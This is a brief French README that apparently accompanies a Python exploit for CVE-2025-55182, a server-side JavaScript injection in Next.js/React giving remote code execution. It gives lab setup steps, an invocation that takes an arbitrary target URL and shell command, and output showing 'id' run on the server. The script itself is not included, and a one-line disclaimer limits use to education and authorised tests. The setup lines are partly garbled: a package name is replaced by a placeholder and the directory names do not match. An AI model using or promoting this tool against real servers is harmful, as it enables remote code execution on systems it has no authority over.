
Exploit Python pour CVE-2025-55182, une injection JavaScript côté serveur dans Next.js/React permettant l'exécution de code à distance via des données multipart malformées. Inclut une configuration de laboratoire pour les tests autorisés.
Script Python 3 pouvant être utilisé pour démontrer CVE-2025-55182. Il exploite une vulnérabilité d'injection JavaScript côté serveur dans les applications Next.js/React, permettant l'exécution de code à distance via des données de formulaire multipart malformées.
⚠️ À des fins éducatives et de tests autorisés uniquement.
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start
pip install requests
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
-u Domaine ou IP cible avec protocole - http://localhost:3000 -c Commande à exécuter sur le serveur - id
[+] Envoi de l'exploit vers http://localhost:3000 avec la commande : id
[+] Résultat de la commande :
uid=1000(app) gid=1000(app) groups=1000(app)